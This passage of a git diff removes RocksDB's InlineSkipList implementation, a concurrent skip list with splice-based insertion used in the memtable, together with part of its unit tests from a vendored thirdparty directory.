-  std::atomic<int> max_height_;  // Height of the entire list
-
-  // seq_splice_ is a Splice used for insertions in the non-concurrent
-  // case.  It caches the prev and next found during the most recent
-  // non-concurrent insertion.
-  Splice* seq_splice_;
-
-  inline int GetMaxHeight() const {
-    return max_height_.load(std::memory_order_relaxed);
-  }
-
-  int RandomHeight();
-
-  Node* AllocateNode(size_t key_size, int height);
-
-  bool Equal(const char* a, const char* b) const {
-    return (compare_(a, b) == 0);
-  }
-
-  bool LessThan(const char* a, const char* b) const {
-    return (compare_(a, b) < 0);
-  }
-
-  // Return true if key is greater than the data stored in "n".  Null n
-  // is considered infinite.  n should not be head_.
-  bool KeyIsAfterNode(const char* key, Node* n) const;
-
-  // Returns the earliest node with a key >= key.
-  // Return nullptr if there is no such node.
-  Node* FindGreaterOrEqual(const char* key) const;
-
-  // Return the latest node with a key < key.
-  // Return head_ if there is no such node.
-  // Fills prev[level] with pointer to previous node at "level" for every
-  // level in [0..max_height_-1], if prev is non-null.
-  Node* FindLessThan(const char* key, Node** prev = nullptr) const;
-
-  // Return the latest node with a key < key on bottom_level. Start searching
-  // from root node on the level below top_level.
-  // Fills prev[level] with pointer to previous node at "level" for every
-  // level in [bottom_level..top_level-1], if prev is non-null.
-  Node* FindLessThan(const char* key, Node** prev, Node* root, int top_level,
-                     int bottom_level) const;
-
-  // Return the last node in the list.
-  // Return head_ if list is empty.
-  Node* FindLast() const;
-
-  // Traverses a single level of the list, setting *out_prev to the last
-  // node before the key and *out_next to the first node after. Assumes
-  // that the key is not present in the skip list. On entry, before should
-  // point to a node that is before the key, and after should point to
-  // a node that is after the key.  after should be nullptr if a good after
-  // node isn't conveniently available.
-  void FindSpliceForLevel(const char* key, Node* before, Node* after, int level,
-                          Node** out_prev, Node** out_next);
-
-  // Recomputes Splice levels from highest_level (inclusive) down to
-  // lowest_level (inclusive).
-  void RecomputeSpliceLevels(const char* key, Splice* splice,
-                             int recompute_level);
-
-  // No copying allowed
-  InlineSkipList(const InlineSkipList&);
-  InlineSkipList& operator=(const InlineSkipList&);
-};
-
-// Implementation details follow
-
-template <class Comparator>
-struct InlineSkipList<Comparator>::Splice {
-  // The invariant of a Splice is that prev_[i+1].key <= prev_[i].key <
-  // next_[i].key <= next_[i+1].key for all i.  That means that if a
-  // key is bracketed by prev_[i] and next_[i] then it is bracketed by
-  // all higher levels.  It is _not_ required that prev_[i]->Next(i) ==
-  // next_[i] (it probably did at some point in the past, but intervening
-  // or concurrent operations might have inserted nodes in between).
-  int height_ = 0;
-  Node** prev_;
-  Node** next_;
-};
-
-// The Node data type is more of a pointer into custom-managed memory than
-// a traditional C++ struct.  The key is stored in the bytes immediately
-// after the struct, and the next_ pointers for nodes with height > 1 are
-// stored immediately _before_ the struct.  This avoids the need to include
-// any pointer or sizing data, which reduces per-node memory overheads.
-template <class Comparator>
-struct InlineSkipList<Comparator>::Node {
-  // Stores the height of the node in the memory location normally used for
-  // next_[0].  This is used for passing data from AllocateKey to Insert.
-  void StashHeight(const int height) {
-    assert(sizeof(int) <= sizeof(next_[0]));
-    memcpy(&next_[0], &height, sizeof(int));
-  }
-
-  // Retrieves the value passed to StashHeight.  Undefined after a call
-  // to SetNext or NoBarrier_SetNext.
-  int UnstashHeight() const {
-    int rv;
-    memcpy(&rv, &next_[0], sizeof(int));
-    return rv;
-  }
-
-  const char* Key() const { return reinterpret_cast<const char*>(&next_[1]); }
-
-  // Accessors/mutators for links.  Wrapped in methods so we can add
-  // the appropriate barriers as necessary, and perform the necessary
-  // addressing trickery for storing links below the Node in memory.
-  Node* Next(int n) {
-    assert(n >= 0);
-    // Use an 'acquire load' so that we observe a fully initialized
-    // version of the returned Node.
-    return (next_[-n].load(std::memory_order_acquire));
-  }
-
-  void SetNext(int n, Node* x) {
-    assert(n >= 0);
-    // Use a 'release store' so that anybody who reads through this
-    // pointer observes a fully initialized version of the inserted node.
-    next_[-n].store(x, std::memory_order_release);
-  }
-
-  bool CASNext(int n, Node* expected, Node* x) {
-    assert(n >= 0);
-    return next_[-n].compare_exchange_strong(expected, x);
-  }
-
-  // No-barrier variants that can be safely used in a few locations.
-  Node* NoBarrier_Next(int n) {
-    assert(n >= 0);
-    return next_[-n].load(std::memory_order_relaxed);
-  }
-
-  void NoBarrier_SetNext(int n, Node* x) {
-    assert(n >= 0);
-    next_[-n].store(x, std::memory_order_relaxed);
-  }
-
-  // Insert node after prev on specific level.
-  void InsertAfter(Node* prev, int level) {
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "this" in prev.
-    NoBarrier_SetNext(level, prev->NoBarrier_Next(level));
-    prev->SetNext(level, this);
-  }
-
- private:
-  // next_[0] is the lowest level link (level 0).  Higher levels are
-  // stored _earlier_, so level 1 is at next_[-1].
-  std::atomic<Node*> next_[1];
-};
-
-template <class Comparator>
-inline InlineSkipList<Comparator>::Iterator::Iterator(
-    const InlineSkipList* list) {
-  SetList(list);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SetList(
-    const InlineSkipList* list) {
-  list_ = list;
-  node_ = nullptr;
-}
-
-template <class Comparator>
-inline bool InlineSkipList<Comparator>::Iterator::Valid() const {
-  return node_ != nullptr;
-}
-
-template <class Comparator>
-inline const char* InlineSkipList<Comparator>::Iterator::key() const {
-  assert(Valid());
-  return node_->Key();
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::Next() {
-  assert(Valid());
-  node_ = node_->Next(0);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::Prev() {
-  // Instead of using explicit "prev" links, we just search for the
-  // last node that falls before key.
-  assert(Valid());
-  node_ = list_->FindLessThan(node_->Key());
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::Seek(const char* target) {
-  node_ = list_->FindGreaterOrEqual(target);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SeekForPrev(
-    const char* target) {
-  Seek(target);
-  if (!Valid()) {
-    SeekToLast();
-  }
-  while (Valid() && list_->LessThan(target, key())) {
-    Prev();
-  }
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SeekToFirst() {
-  node_ = list_->head_->Next(0);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SeekToLast() {
-  node_ = list_->FindLast();
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template <class Comparator>
-int InlineSkipList<Comparator>::RandomHeight() {
-  auto rnd = Random::GetTLSInstance();
-
-  // Increase height with probability 1 in kBranching
-  int height = 1;
-  while (height < kMaxHeight_ && height < kMaxPossibleHeight &&
-         rnd->Next() < kScaledInverseBranching_) {
-    height++;
-  }
-  assert(height > 0);
-  assert(height <= kMaxHeight_);
-  assert(height <= kMaxPossibleHeight);
-  return height;
-}
-
-template <class Comparator>
-bool InlineSkipList<Comparator>::KeyIsAfterNode(const char* key,
-                                                Node* n) const {
-  // nullptr n is considered infinite
-  assert(n != head_);
-  return (n != nullptr) && (compare_(n->Key(), key) < 0);
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindGreaterOrEqual(const char* key) const {
-  // Note: It looks like we could reduce duplication by implementing
-  // this function as FindLessThan(key)->Next(0), but we wouldn't be able
-  // to exit early on equality and the result wouldn't even be correct.
-  // A concurrent insert might occur after FindLessThan(key) but before
-  // we get a chance to call Next(0).
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  Node* last_bigger = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    // Make sure the lists are sorted
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->Key(), x));
-    // Make sure we haven't overshot during our search
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    int cmp = (next == nullptr || next == last_bigger)
-                  ? 1
-                  : compare_(next->Key(), key);
-    if (cmp == 0 || (cmp > 0 && level == 0)) {
-      return next;
-    } else if (cmp < 0) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      // Switch to next list, reuse compare_() result
-      last_bigger = next;
-      level--;
-    }
-  }
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindLessThan(const char* key, Node** prev) const {
-  return FindLessThan(key, prev, head_, GetMaxHeight(), 0);
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindLessThan(const char* key, Node** prev,
-                                         Node* root, int top_level,
-                                         int bottom_level) const {
-  assert(top_level > bottom_level);
-  int level = top_level - 1;
-  Node* x = root;
-  // KeyIsAfter(key, last_not_after) is definitely false
-  Node* last_not_after = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->Key(), x));
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    if (next != last_not_after && KeyIsAfterNode(key, next)) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      if (prev != nullptr) {
-        prev[level] = x;
-      }
-      if (level == bottom_level) {
-        return x;
-      } else {
-        // Switch to next list, reuse KeyIsAfterNode() result
-        last_not_after = next;
-        level--;
-      }
-    }
-  }
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindLast() const {
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    Node* next = x->Next(level);
-    if (next == nullptr) {
-      if (level == 0) {
-        return x;
-      } else {
-        // Switch to next list
-        level--;
-      }
-    } else {
-      x = next;
-    }
-  }
-}
-
-template <class Comparator>
-uint64_t InlineSkipList<Comparator>::EstimateCount(const char* key) const {
-  uint64_t count = 0;
-
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    assert(x == head_ || compare_(x->Key(), key) < 0);
-    Node* next = x->Next(level);
-    if (next == nullptr || compare_(next->Key(), key) >= 0) {
-      if (level == 0) {
-        return count;
-      } else {
-        // Switch to next list
-        count *= kBranching_;
-        level--;
-      }
-    } else {
-      x = next;
-      count++;
-    }
-  }
-}
-
-template <class Comparator>
-InlineSkipList<Comparator>::InlineSkipList(const Comparator cmp,
-                                           Allocator* allocator,
-                                           int32_t max_height,
-                                           int32_t branching_factor)
-    : kMaxHeight_(max_height),
-      kBranching_(branching_factor),
-      kScaledInverseBranching_((Random::kMaxNext + 1) / kBranching_),
-      compare_(cmp),
-      allocator_(allocator),
-      head_(AllocateNode(0, max_height)),
-      max_height_(1),
-      seq_splice_(AllocateSplice()) {
-  assert(max_height > 0 && kMaxHeight_ == static_cast<uint32_t>(max_height));
-  assert(branching_factor > 1 &&
-         kBranching_ == static_cast<uint32_t>(branching_factor));
-  assert(kScaledInverseBranching_ > 0);
-
-  for (int i = 0; i < kMaxHeight_; ++i) {
-    head_->SetNext(i, nullptr);
-  }
-}
-
-template <class Comparator>
-char* InlineSkipList<Comparator>::AllocateKey(size_t key_size) {
-  return const_cast<char*>(AllocateNode(key_size, RandomHeight())->Key());
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::AllocateNode(size_t key_size, int height) {
-  auto prefix = sizeof(std::atomic<Node*>) * (height - 1);
-
-  // prefix is space for the height - 1 pointers that we store before
-  // the Node instance (next_[-(height - 1) .. -1]).  Node starts at
-  // raw + prefix, and holds the bottom-mode (level 0) skip list pointer
-  // next_[0].  key_size is the bytes for the key, which comes just after
-  // the Node.
-  char* raw = allocator_->AllocateAligned(prefix + sizeof(Node) + key_size);
-  Node* x = reinterpret_cast<Node*>(raw + prefix);
-
-  // Once we've linked the node into the skip list we don't actually need
-  // to know its height, because we can implicitly use the fact that we
-  // traversed into a node at level h to known that h is a valid level
-  // for that node.  We need to convey the height to the Insert step,
-  // however, so that it can perform the proper links.  Since we're not
-  // using the pointers at the moment, StashHeight temporarily borrow
-  // storage from next_[0] for that purpose.
-  x->StashHeight(height);
-  return x;
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Splice*
-InlineSkipList<Comparator>::AllocateSplice() {
-  // size of prev_ and next_
-  size_t array_size = sizeof(Node*) * (kMaxHeight_ + 1);
-  char* raw = allocator_->AllocateAligned(sizeof(Splice) + array_size * 2);
-  Splice* splice = reinterpret_cast<Splice*>(raw);
-  splice->height_ = 0;
-  splice->prev_ = reinterpret_cast<Node**>(raw + sizeof(Splice));
-  splice->next_ = reinterpret_cast<Node**>(raw + sizeof(Splice) + array_size);
-  return splice;
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::Insert(const char* key) {
-  Insert<false>(key, seq_splice_, false);
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::InsertConcurrently(const char* key) {
-  Node* prev[kMaxPossibleHeight];
-  Node* next[kMaxPossibleHeight];
-  Splice splice;
-  splice.prev_ = prev;
-  splice.next_ = next;
-  Insert<true>(key, &splice, false);
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::InsertWithHint(const char* key, void** hint) {
-  assert(hint != nullptr);
-  Splice* splice = reinterpret_cast<Splice*>(*hint);
-  if (splice == nullptr) {
-    splice = AllocateSplice();
-    *hint = reinterpret_cast<void*>(splice);
-  }
-  Insert<false>(key, splice, true);
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::FindSpliceForLevel(const char* key,
-                                                    Node* before, Node* after,
-                                                    int level, Node** out_prev,
-                                                    Node** out_next) {
-  while (true) {
-    Node* next = before->Next(level);
-    assert(before == head_ || next == nullptr ||
-           KeyIsAfterNode(next->Key(), before));
-    assert(before == head_ || KeyIsAfterNode(key, before));
-    if (next == after || !KeyIsAfterNode(key, next)) {
-      // found it
-      *out_prev = before;
-      *out_next = next;
-      return;
-    }
-    before = next;
-  }
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::RecomputeSpliceLevels(const char* key,
-                                                       Splice* splice,
-                                                       int recompute_level) {
-  assert(recompute_level > 0);
-  assert(recompute_level <= splice->height_);
-  for (int i = recompute_level - 1; i >= 0; --i) {
-    FindSpliceForLevel(key, splice->prev_[i + 1], splice->next_[i + 1], i,
-                       &splice->prev_[i], &splice->next_[i]);
-  }
-}
-
-template <class Comparator>
-template <bool UseCAS>
-void InlineSkipList<Comparator>::Insert(const char* key, Splice* splice,
-                                        bool allow_partial_splice_fix) {
-  Node* x = reinterpret_cast<Node*>(const_cast<char*>(key)) - 1;
-  int height = x->UnstashHeight();
-  assert(height >= 1 && height <= kMaxHeight_);
-
-  int max_height = max_height_.load(std::memory_order_relaxed);
-  while (height > max_height) {
-    if (max_height_.compare_exchange_weak(max_height, height)) {
-      // successfully updated it
-      max_height = height;
-      break;
-    }
-    // else retry, possibly exiting the loop because somebody else
-    // increased it
-  }
-  assert(max_height <= kMaxPossibleHeight);
-
-  int recompute_height = 0;
-  if (splice->height_ < max_height) {
-    // Either splice has never been used or max_height has grown since
-    // last use.  We could potentially fix it in the latter case, but
-    // that is tricky.
-    splice->prev_[max_height] = head_;
-    splice->next_[max_height] = nullptr;
-    splice->height_ = max_height;
-    recompute_height = max_height;
-  } else {
-    // Splice is a valid proper-height splice that brackets some
-    // key, but does it bracket this one?  We need to validate it and
-    // recompute a portion of the splice (levels 0..recompute_height-1)
-    // that is a superset of all levels that don't bracket the new key.
-    // Several choices are reasonable, because we have to balance the work
-    // saved against the extra comparisons required to validate the Splice.
-    //
-    // One strategy is just to recompute all of orig_splice_height if the
-    // bottom level isn't bracketing.  This pessimistically assumes that
-    // we will either get a perfect Splice hit (increasing sequential
-    // inserts) or have no locality.
-    //
-    // Another strategy is to walk up the Splice's levels until we find
-    // a level that brackets the key.  This strategy lets the Splice
-    // hint help for other cases: it turns insertion from O(log N) into
-    // O(log D), where D is the number of nodes in between the key that
-    // produced the Splice and the current insert (insertion is aided
-    // whether the new key is before or after the splice).  If you have
-    // a way of using a prefix of the key to map directly to the closest
-    // Splice out of O(sqrt(N)) Splices and we make it so that splices
-    // can also be used as hints during read, then we end up with Oshman's
-    // and Shavit's SkipTrie, which has O(log log N) lookup and insertion
-    // (compare to O(log N) for skip list).
-    //
-    // We control the pessimistic strategy with allow_partial_splice_fix.
-    // A good strategy is probably to be pessimistic for seq_splice_,
-    // optimistic if the caller actually went to the work of providing
-    // a Splice.
-    while (recompute_height < max_height) {
-      if (splice->prev_[recompute_height]->Next(recompute_height) !=
-          splice->next_[recompute_height]) {
-        // splice isn't tight at this level, there must have been some inserts
-        // to this
-        // location that didn't update the splice.  We might only be a little
-        // stale, but if
-        // the splice is very stale it would be O(N) to fix it.  We haven't used
-        // up any of
-        // our budget of comparisons, so always move up even if we are
-        // pessimistic about
-        // our chances of success.
-        ++recompute_height;
-      } else if (splice->prev_[recompute_height] != head_ &&
-                 !KeyIsAfterNode(key, splice->prev_[recompute_height])) {
-        // key is from before splice
-        if (allow_partial_splice_fix) {
-          // skip all levels with the same node without more comparisons
-          Node* bad = splice->prev_[recompute_height];
-          while (splice->prev_[recompute_height] == bad) {
-            ++recompute_height;
-          }
-        } else {
-          // we're pessimistic, recompute everything
-          recompute_height = max_height;
-        }
-      } else if (KeyIsAfterNode(key, splice->next_[recompute_height])) {
-        // key is from after splice
-        if (allow_partial_splice_fix) {
-          Node* bad = splice->next_[recompute_height];
-          while (splice->next_[recompute_height] == bad) {
-            ++recompute_height;
-          }
-        } else {
-          recompute_height = max_height;
-        }
-      } else {
-        // this level brackets the key, we won!
-        break;
-      }
-    }
-  }
-  assert(recompute_height <= max_height);
-  if (recompute_height > 0) {
-    RecomputeSpliceLevels(key, splice, recompute_height);
-  }
-
-  bool splice_is_valid = true;
-  if (UseCAS) {
-    for (int i = 0; i < height; ++i) {
-      while (true) {
-        assert(splice->next_[i] == nullptr ||
-               compare_(x->Key(), splice->next_[i]->Key()) < 0);
-        assert(splice->prev_[i] == head_ ||
-               compare_(splice->prev_[i]->Key(), x->Key()) < 0);
-        x->NoBarrier_SetNext(i, splice->next_[i]);
-        if (splice->prev_[i]->CASNext(i, splice->next_[i], x)) {
-          // success
-          break;
-        }
-        // CAS failed, we need to recompute prev and next. It is unlikely
-        // to be helpful to try to use a different level as we redo the
-        // search, because it should be unlikely that lots of nodes have
-        // been inserted between prev[i] and next[i]. No point in using
-        // next[i] as the after hint, because we know it is stale.
-        FindSpliceForLevel(key, splice->prev_[i], nullptr, i, &splice->prev_[i],
-                           &splice->next_[i]);
-
-        // Since we've narrowed the bracket for level i, we might have
-        // violated the Splice constraint between i and i-1.  Make sure
-        // we recompute the whole thing next time.
-        if (i > 0) {
-          splice_is_valid = false;
-        }
-      }
-    }
-  } else {
-    for (int i = 0; i < height; ++i) {
-      if (i >= recompute_height &&
-          splice->prev_[i]->Next(i) != splice->next_[i]) {
-        FindSpliceForLevel(key, splice->prev_[i], nullptr, i, &splice->prev_[i],
-                           &splice->next_[i]);
-      }
-      assert(splice->next_[i] == nullptr ||
-             compare_(x->Key(), splice->next_[i]->Key()) < 0);
-      assert(splice->prev_[i] == head_ ||
-             compare_(splice->prev_[i]->Key(), x->Key()) < 0);
-      assert(splice->prev_[i]->Next(i) == splice->next_[i]);
-      x->NoBarrier_SetNext(i, splice->next_[i]);
-      splice->prev_[i]->SetNext(i, x);
-    }
-  }
-  if (splice_is_valid) {
-    for (int i = 0; i < height; ++i) {
-      splice->prev_[i] = x;
-    }
-    assert(splice->prev_[splice->height_] == head_);
-    assert(splice->next_[splice->height_] == nullptr);
-    for (int i = 0; i < splice->height_; ++i) {
-      assert(splice->next_[i] == nullptr ||
-             compare_(key, splice->next_[i]->Key()) < 0);
-      assert(splice->prev_[i] == head_ ||
-             compare_(splice->prev_[i]->Key(), key) <= 0);
-      assert(splice->prev_[i + 1] == splice->prev_[i] ||
-             splice->prev_[i + 1] == head_ ||
-             compare_(splice->prev_[i + 1]->Key(), splice->prev_[i]->Key()) <
-                 0);
-      assert(splice->next_[i + 1] == splice->next_[i] ||
-             splice->next_[i + 1] == nullptr ||
-             compare_(splice->next_[i]->Key(), splice->next_[i + 1]->Key()) <
-                 0);
-    }
-  } else {
-    splice->height_ = 0;
-  }
-}
-
-template <class Comparator>
-bool InlineSkipList<Comparator>::Contains(const char* key) const {
-  Node* x = FindGreaterOrEqual(key);
-  if (x != nullptr && Equal(key, x->Key())) {
-    return true;
-  } else {
-    return false;
-  }
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::TEST_Validate() const {
-  // Interate over all levels at the same time, and verify nodes appear in
-  // the right order, and nodes appear in upper level also appear in lower
-  // levels.
-  Node* nodes[kMaxPossibleHeight];
-  int max_height = GetMaxHeight();
-  for (int i = 0; i < max_height; i++) {
-    nodes[i] = head_;
-  }
-  while (nodes[0] != nullptr) {
-    Node* l0_next = nodes[0]->Next(0);
-    if (l0_next == nullptr) {
-      break;
-    }
-    assert(nodes[0] == head_ || compare_(nodes[0]->Key(), l0_next->Key()) < 0);
-    nodes[0] = l0_next;
-
-    int i = 1;
-    while (i < max_height) {
-      Node* next = nodes[i]->Next(i);
-      if (next == nullptr) {
-        break;
-      }
-      auto cmp = compare_(nodes[0]->Key(), next->Key());
-      assert(cmp <= 0);
-      if (cmp == 0) {
-        assert(next == nodes[0]);
-        nodes[i] = next;
-      } else {
-        break;
-      }
-      i++;
-    }
-  }
-  for (int i = 1; i < max_height; i++) {
-    assert(nodes[i]->Next(i) == nullptr);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/inlineskiplist_test.cc b/thirdparty/rocksdb/memtable/inlineskiplist_test.cc
deleted file mode 100644
index 5803e5b..0000000
--- a/thirdparty/rocksdb/memtable/inlineskiplist_test.cc
+++ /dev/null
@@ -1,626 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "memtable/inlineskiplist.h"
-#include <set>
-#include <unordered_set>
-#include "rocksdb/env.h"
-#include "util/concurrent_arena.h"
-#include "util/hash.h"
-#include "util/random.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// Our test skip list stores 8-byte unsigned integers
-typedef uint64_t Key;
-
-static const char* Encode(const uint64_t* key) {
-  return reinterpret_cast<const char*>(key);
-}
-
-static Key Decode(const char* key) {
-  Key rv;
-  memcpy(&rv, key, sizeof(Key));
-  return rv;
-}
-
-struct TestComparator {
-  int operator()(const char* a, const char* b) const {
-    if (Decode(a) < Decode(b)) {
-      return -1;
-    } else if (Decode(a) > Decode(b)) {
-      return +1;
-    } else {
-      return 0;
-    }
-  }
-};
-
-typedef InlineSkipList<TestComparator> TestInlineSkipList;
-
-class InlineSkipTest : public testing::Test {
- public:
-  void Insert(TestInlineSkipList* list, Key key) {
-    char* buf = list->AllocateKey(sizeof(Key));
-    memcpy(buf, &key, sizeof(Key));
-    list->Insert(buf);
-    keys_.insert(key);
-  }
-
-  void InsertWithHint(TestInlineSkipList* list, Key key, void** hint) {
-    char* buf = list->AllocateKey(sizeof(Key));
-    memcpy(buf, &key, sizeof(Key));
-    list->InsertWithHint(buf, hint);
-    keys_.insert(key);
-  }
-
-  void Validate(TestInlineSkipList* list) {
-    // Check keys exist.
-    for (Key key : keys_) {
-      ASSERT_TRUE(list->Contains(Encode(&key)));
-    }
-    // Iterate over the list, make sure keys appears in order and no extra
-    // keys exist.
-    TestInlineSkipList::Iterator iter(list);
-    ASSERT_FALSE(iter.Valid());
-    Key zero = 0;
-    iter.Seek(Encode(&zero));
-    for (Key key : keys_) {
-      ASSERT_TRUE(iter.Valid());
-      ASSERT_EQ(key, Decode(iter.key()));
-      iter.Next();
-    }
-    ASSERT_FALSE(iter.Valid());
-    // Validate the list is well-formed.
-    list->TEST_Validate();
-  }
-
- private:
-  std::set<Key> keys_;
-};
-
-TEST_F(InlineSkipTest, Empty) {
-  Arena arena;
-  TestComparator cmp;
-  InlineSkipList<TestComparator> list(cmp, &arena);
-  Key key = 10;
-  ASSERT_TRUE(!list.Contains(Encode(&key)));
-
-  InlineSkipList<TestComparator>::Iterator iter(&list);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToFirst();
-  ASSERT_TRUE(!iter.Valid());
-  key = 100;
-  iter.Seek(Encode(&key));
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekForPrev(Encode(&key));
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToLast();
-  ASSERT_TRUE(!iter.Valid());
-}
-
-TEST_F(InlineSkipTest, InsertAndLookup) {
-  const int N = 2000;
-  const int R = 5000;
-  Random rnd(1000);
-  std::set<Key> keys;
-  ConcurrentArena arena;
-  TestComparator cmp;
-  InlineSkipList<TestComparator> list(cmp, &arena);
-  for (int i = 0; i < N; i++) {
-    Key key = rnd.Next() % R;
-    if (keys.insert(key).second) {
-      char* buf = list.AllocateKey(sizeof(Key));
-      memcpy(buf, &key, sizeof(Key));
-      list.Insert(buf);
-    }
-  }
-
-  for (Key i = 0; i < R; i++) {
-    if (list.Contains(Encode(&i))) {
-      ASSERT_EQ(keys.count(i), 1U);
-    } else {
-      ASSERT_EQ(keys.count(i), 0U);
-    }
-  }
-
-  // Simple iterator tests
-  {
-    InlineSkipList<TestComparator>::Iterator iter(&list);
-    ASSERT_TRUE(!iter.Valid());
-
-    uint64_t zero = 0;
-    iter.Seek(Encode(&zero));
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), Decode(iter.key()));
-
-    uint64_t max_key = R - 1;
-    iter.SeekForPrev(Encode(&max_key));
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), Decode(iter.key()));
-
-    iter.SeekToFirst();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), Decode(iter.key()));
-
-    iter.SeekToLast();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), Decode(iter.key()));
-  }
-
-  // Forward iteration test
-  for (Key i = 0; i < R; i++) {
-    InlineSkipList<TestComparator>::Iterator iter(&list);
-    iter.Seek(Encode(&i));
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.lower_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.end()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*model_iter, Decode(iter.key()));
-        ++model_iter;
-        iter.Next();
-      }
-    }
-  }
-
-  // Backward iteration test
-  for (Key i = 0; i < R; i++) {
-    InlineSkipList<TestComparator>::Iterator iter(&list);
-    iter.SeekForPrev(Encode(&i));
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.upper_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.begin()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*--model_iter, Decode(iter.key()));
-        iter.Prev();
-      }
-    }
-  }
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_Sequential) {
-  const int N = 100000;
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  void* hint = nullptr;
-  for (int i = 0; i < N; i++) {
-    Key key = i;
-    InsertWithHint(&list, key, &hint);
-  }
-  Validate(&list);
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_MultipleHints) {
-  const int N = 100000;
-  const int S = 100;
-  Random rnd(534);
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  void* hints[S];
-  Key last_key[S];
-  for (int i = 0; i < S; i++) {
-    hints[i] = nullptr;
-    last_key[i] = 0;
-  }
-  for (int i = 0; i < N; i++) {
-    Key s = rnd.Uniform(S);
-    Key key = (s << 32) + (++last_key[s]);
-    InsertWithHint(&list, key, &hints[s]);
-  }
-  Validate(&list);
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_MultipleHintsRandom) {
-  const int N = 100000;
-  const int S = 100;
-  Random rnd(534);
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  void* hints[S];
-  for (int i = 0; i < S; i++) {
-    hints[i] = nullptr;
-  }
-  for (int i = 0; i < N; i++) {
-    Key s = rnd.Uniform(S);
-    Key key = (s << 32) + rnd.Next();
-    InsertWithHint(&list, key, &hints[s]);
-  }
-  Validate(&list);
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_CompatibleWithInsertWithoutHint) {
-  const int N = 100000;
-  const int S1 = 100;
-  const int S2 = 100;
-  Random rnd(534);
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  std::unordered_set<Key> used;
-  Key with_hint[S1];
-  Key without_hint[S2];
-  void* hints[S1];
-  for (int i = 0; i < S1; i++) {
-    hints[i] = nullptr;
-    while (true) {
-      Key s = rnd.Next();
-      if (used.insert(s).second) {
-        with_hint[i] = s;
-        break;
-      }
-    }
-  }
-  for (int i = 0; i < S2; i++) {
-    while (true) {
-      Key s = rnd.Next();
-      if (used.insert(s).second) {
-        without_hint[i] = s;
-        break;
-      }
-    }
-  }
-  for (int i = 0; i < N; i++) {
-    Key s = rnd.Uniform(S1 + S2);
-    if (s < S1) {
-      Key key = (with_hint[s] << 32) + rnd.Next();
-      InsertWithHint(&list, key, &hints[s]);
-    } else {
-      Key key = (without_hint[s - S1] << 32) + rnd.Next();
-      Insert(&list, key);
-    }
-  }
-  Validate(&list);
-}
-
